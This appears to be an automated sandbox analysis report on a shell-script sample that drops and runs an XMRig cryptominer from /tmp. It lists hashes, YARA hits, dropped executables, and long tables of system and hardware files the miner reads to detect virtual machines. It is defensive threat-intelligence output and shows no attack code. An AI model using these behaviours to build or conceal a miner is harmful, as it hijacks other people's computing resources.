Analysis
max time kernel: 149s
max time network: 150s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240729-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240729-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 24/10/2024, 01:53
Static task: static1
Behavioral task: behavioral1
  Sample: 8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh
  Resource: ubuntu1804-amd64-20240729-en
Behavioral task: behavioral2
  Sample: 8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh
  Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
  Sample: 8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh
  Resource: debian9-mipsbe-20240418-en
Behavioral task: behavioral4
  Sample: 8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh
  Resource: debian9-mipsel-20240418-en
General
Target: 8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh
Size: 244B
MD5: 9206fb1df325876fc6297e75be2a7d5a
SHA1: 2361ae7b1d637d0a4259f67cc36c2af142541262
SHA256: 8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb
SHA512: 12ce08238c8fc3e8591700718e3018c8405b946f38360655c394bc6801f7204b27c505f981da161fe16c3f570eb066c367ff86aa73163b3b7ddc37d3e14c3402
Malware Config
Signatures

XMRig Miner payload 2 IoCs
resource | yara_rule
behavioral1/files/fstream-2.dat | family_xmrig
behavioral1/files/fstream-2.dat | xmrig
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid | Process
1528 | chmod
1529 | chmod
1530 | chmod
Executes dropped EXE 43 IoCs
ioc | pid | Process
/tmp/check.sh | 1531 | check.sh
/tmp/xmrigDaemon | 1533 | xmrigDaemon
/tmp/xmrigMiner | 1535 | xmrigMiner
/tmp/xmrigMiner | 1543 | xmrigMiner
/tmp/xmrigMiner | 1551 | xmrigMiner
/tmp/xmrigMiner | 1559 | xmrigMiner
/tmp/xmrigMiner | 1567 | xmrigMiner
/tmp/xmrigMiner | 1575 | xmrigMiner
/tmp/xmrigMiner | 1583 | xmrigMiner
/tmp/xmrigMiner | 1591 | xmrigMiner
/tmp/xmrigMiner | 1599 | xmrigMiner
/tmp/xmrigMiner | 1607 | xmrigMiner
/tmp/xmrigMiner | 1615 | xmrigMiner
/tmp/xmrigMiner | 1623 | xmrigMiner
/tmp/xmrigMiner | 1631 | xmrigMiner
/tmp/xmrigMiner | 1641 | xmrigMiner
/tmp/xmrigMiner | 1649 | xmrigMiner
/tmp/xmrigMiner | 1657 | xmrigMiner
/tmp/xmrigMiner | 1665 | xmrigMiner
/tmp/xmrigMiner | 1673 | xmrigMiner
/tmp/xmrigMiner | 1681 | xmrigMiner
/tmp/xmrigMiner | 1689 | xmrigMiner
/tmp/xmrigMiner | 1697 | xmrigMiner
/tmp/xmrigMiner | 1705 | xmrigMiner
/tmp/xmrigMiner | 1713 | xmrigMiner
/tmp/xmrigMiner | 1721 | xmrigMiner
/tmp/xmrigMiner | 1729 | xmrigMiner
/tmp/xmrigMiner | 1737 | xmrigMiner
/tmp/xmrigMiner | 1745 | xmrigMiner
/tmp/xmrigMiner | 1753 | xmrigMiner
/tmp/xmrigMiner | 1761 | xmrigMiner
/tmp/xmrigMiner | 1769 | xmrigMiner
/tmp/xmrigMiner | 1777 | xmrigMiner
/tmp/xmrigMiner | 1785 | xmrigMiner
/tmp/xmrigMiner | 1793 | xmrigMiner
/tmp/xmrigMiner | 1801 | xmrigMiner
/tmp/xmrigMiner | 1809 | xmrigMiner
/tmp/xmrigMiner | 1817 | xmrigMiner
/tmp/xmrigMiner | 1825 | xmrigMiner
/tmp/xmrigMiner | 1833 | xmrigMiner
/tmp/xmrigMiner | 1841 | xmrigMiner
/tmp/xmrigMiner | 1849 | xmrigMiner
/tmp/xmrigMiner | 1857 | xmrigMiner
Checks hardware identifiers (DMI) 1 TTPs 64 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description | ioc | Process
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/bios_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/bios_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/bios_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/bios_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/bios_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/bios_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/bios_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/bios_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/bios_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/bios_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/bios_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | xmrigMiner
Enumerates running processes
Discovers information about currently running processes on the system
Reads hardware information 1 TTPs 64 IoCs
Accesses system info like serial numbers, manufacturer names etc.
description | ioc | Process
File opened for reading | /sys/devices/virtual/dmi/id/chassis_version | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_version | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_type | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_type | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_uuid | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_asset_tag | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_version | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_asset_tag | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_asset_tag | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_serial | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_version | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_type | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_serial | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/bios_date | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_asset_tag | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_version | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/bios_version | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_version | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_asset_tag | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/bios_date | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_asset_tag | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_serial | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_version | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_version | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_serial | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_uuid | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_type | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_serial | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_serial | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_version | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_asset_tag | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_uuid | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_asset_tag | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_serial | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_version | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/bios_date | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_serial | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_serial | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_asset_tag | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/bios_date | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_version | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_type | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_asset_tag | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_version | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_version | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_asset_tag | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_uuid | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_version | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_version | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_asset_tag | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/bios_version | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/chassis_vendor | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_asset_tag | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_name | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_serial | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/product_serial | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id/board_asset_tag | xmrigMiner
Checks CPU configuration 1 TTPs 41 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description | ioc | Process
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
File opened for reading | /proc/cpuinfo | xmrigMiner
Reads CPU attributes 1 TTPs 64 IoCs
description | ioc | Process
File opened for reading | /sys/devices/system/cpu/cpu0/topology/core_id | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition | xmrigMiner
File opened for reading | /sys/devices/system/cpu/online | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cpu_capacity | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/topology/die_cpus | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index0/id | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map | xmrigMiner
File opened for reading | /sys/devices/system/cpu/online | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cpu_capacity | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/topology/cluster_cpus | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index1/id | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index2/id | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq | xmrigMiner
File opened for reading | /sys/devices/system/cpu/possible | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index2/type | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/topology/core_id | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index2/id | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index2/size | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index3/level | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index2/size | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/topology/cluster_cpus | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index0/size | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/topology/core_siblings | xmrigMiner
File opened for reading | /sys/devices/system/cpu/possible | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/topology/thread_siblings | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index0/type | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index2/level | xmrigMiner
File opened for reading | /sys/devices/system/cpu/online | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index1/type | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index0/id | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/topology/die_cpus | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/topology/die_cpus | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index0/level | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/topology/thread_siblings | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/topology/core_id | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/topology/thread_siblings | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index2/type | xmrigMiner
File opened for reading | /sys/devices/system/cpu/online | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index1/id | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index2/level | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map | xmrigMiner
File opened for reading | /sys/devices/system/cpu/cpu0/cache/index2/level | xmrigMiner
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description | ioc | Process
File opened for reading | /sys/devices/virtual/dmi/id | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/access0/initiators/write_bandwidth | xmrigMiner
File opened for reading | /sys/fs/cgroup/cpuset/cpuset.mems | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/meminfo | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/free_hugepages | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/cpumap | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id | xmrigMiner
File opened for reading | /sys/fs/cgroup/cpuset/cpuset.cpus | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/access0/initiators/write_latency | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/meminfo | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/access0/initiators/read_bandwidth | xmrigMiner
File opened for reading | /sys/fs/cgroup/cpuset/cpuset.cpus | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/access0/initiators/read_latency | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/meminfo | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/meminfo | xmrigMiner
File opened for reading | /sys/fs/cgroup/cpuset/cpuset.cpus | xmrigMiner
File opened for reading | /sys/devices/system/cpu | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/access0/initiators/read_latency | xmrigMiner
File opened for reading | /sys/fs/cgroup/cpuset/cpuset.mems | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/access0/initiators/write_bandwidth | xmrigMiner
File opened for reading | /sys/firmware/dmi/tables/smbios_entry_point | xmrigMiner
File opened for reading | /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages | xmrigMiner
File opened for reading | /sys/fs/cgroup/cpuset/cpuset.cpus | xmrigMiner
File opened for reading | /sys/bus/dax/devices | xmrigMiner
File opened for reading | /sys/devices/cpu_core/cpus | xmrigMiner
File opened for reading | /sys/firmware/dmi/tables/smbios_entry_point | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/cpumap | xmrigMiner
File opened for reading | /sys/kernel/mm/hugepages | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/access0/initiators/write_latency | xmrigMiner
File opened for reading | /sys/fs/cgroup/cpuset/cpuset.mems | xmrigMiner
File opened for reading | /sys/bus/soc/devices | xmrigMiner
File opened for reading | /sys/fs/cgroup/cpuset/cpuset.mems | xmrigMiner
File opened for reading | /sys/firmware/dmi/tables/DMI | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/access0/initiators/read_bandwidth | xmrigMiner
File opened for reading | /sys/devices/cpu_atom/cpus | xmrigMiner
File opened for reading | /sys/devices/cpu_core/cpus | xmrigMiner
File opened for reading | /sys/devices/cpu_core/cpus | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/cpumap | xmrigMiner
File opened for reading | /sys/devices/virtual/dmi/id | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/meminfo | xmrigMiner
File opened for reading | /sys/fs/cgroup/unified/cgroup.controllers | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/meminfo | xmrigMiner
File opened for reading | /sys/bus/dax/devices | xmrigMiner
File opened for reading | /sys/bus/dax/devices | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/access0/initiators/read_latency | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages | xmrigMiner
File opened for reading | /sys/devices/system/node/online | xmrigMiner
File opened for reading | /sys/firmware/dmi/tables/DMI | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/access0/initiators/write_bandwidth | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/access0/initiators/write_bandwidth | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/access0/initiators/write_latency | xmrigMiner
File opened for reading | /sys/firmware/dmi/tables/DMI | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/cpumap | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/access0/initiators | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/access0/initiators/read_bandwidth | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages | xmrigMiner
File opened for reading | /sys/kernel/mm/hugepages | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/free_hugepages | xmrigMiner
File opened for reading | /sys/devices/system/node/node0/access0/initiators/read_bandwidth | xmrigMiner
File opened for reading | /sys/devices/system/cpu | xmrigMiner
Reads runtime system information
description | ioc | Process
File opened for reading | /proc/driver/nvidia/gpus | xmrigMiner
File opened for reading | /proc/meminfo | xmrigMiner
File opened for reading | /proc/mounts | xmrigMiner
File opened for reading | /proc/meminfo | xmrigMiner
File opened for reading | /proc/driver/nvidia/gpus | xmrigMiner
File opened for reading | /proc/170/status | pgrep
File opened for reading | /proc/172/status | pgrep
File opened for reading | /proc/587/status | pgrep
File opened for reading | /proc/version_signature | xmrigMiner
File opened for reading | /proc/179/status | pgrep
File opened for reading | /proc/183/cmdline | pgrep
File opened for reading | /proc/1150/cmdline | pgrep
File opened for reading | /proc/driver/nvidia/gpus | xmrigMiner
File opened for reading | /proc/mounts | xmrigMiner
File opened for reading | /proc/sys/vm/nr_hugepages | xmrigMiner
File opened for reading | /proc/cmdline | xmrigMiner
File opened for reading | /proc/10/status | pgrep
File opened for reading | /proc/23/cmdline | pgrep
File opened for reading | /proc/mounts | xmrigMiner
File opened for reading | /proc/1201/cmdline | pgrep
File opened for reading | /proc/cmdline | xmrigMiner
File opened for reading | /proc/5/cmdline | pgrep
File opened for reading | /proc/719/status | pgrep
File opened for reading | /proc/1191/status | pgrep
File opened for reading | /proc/sys/vm/nr_hugepages | xmrigMiner
File opened for reading | /proc/499/cmdline | pgrep
File opened for reading | /proc/meminfo | xmrigMiner
File opened for reading | /proc/meminfo | xmrigMiner
File opened for reading | /proc/self/cpuset | xmrigMiner
File opened for reading | /proc/self/cpuset | xmrigMiner
File opened for reading | /proc/version_signature | xmrigMiner
File opened for reading | /proc/1031/cmdline | pgrep
File opened for reading | /proc/1286/cmdline | pgrep
File opened for reading | /proc/1365/cmdline | pgrep
File opened for reading | /proc/974/status | pgrep
File opened for reading | /proc/1201/status | pgrep
File opened for reading | /proc/self/cpuset | xmrigMiner
File opened for reading | /proc/driver/nvidia/gpus | xmrigMiner
File opened for reading | /proc/version_signature | xmrigMiner
File opened for reading | /proc/1/status | pgrep
File opened for reading | /proc/770/status | pgrep
File opened for reading | /proc/961/cmdline | pgrep
File opened for reading | /proc/self/cpuset | xmrigMiner
File opened for reading | /proc/545/cmdline | pgrep
File opened for reading | /proc/cmdline | xmrigMiner
File opened for reading | /proc/version_signature | xmrigMiner
File opened for reading | /proc/cmdline | xmrigMiner
File opened for reading | /proc/driver/nvidia/gpus | xmrigMiner
File opened for reading | /proc/cmdline | xmrigMiner
File opened for reading | /proc/171/cmdline | pgrep
File opened for reading | /proc/173/status | pgrep
File opened for reading | /proc/1129/cmdline | pgrep
File opened for reading | /proc/16/cmdline | pgrep
File opened for reading | /proc/cmdline | xmrigMiner
File opened for reading | /proc/driver/nvidia/gpus | xmrigMiner
File opened for reading | /proc/mounts | xmrigMiner
File opened for reading | /proc/1133/cmdline | pgrep
File opened for reading | /proc/1517/cmdline | pgrep
File opened for reading | /proc/1531/cmdline | pgrep
File opened for reading | /proc/cmdline | xmrigMiner
File opened for reading | /proc/cmdline | xmrigMiner
File opened for reading | /proc/34/status | pgrep
File opened for reading | /proc/571/status | pgrep
File opened for reading | /proc/1232/cmdline | pgrep
Writes file to tmp directory 46 IoCs
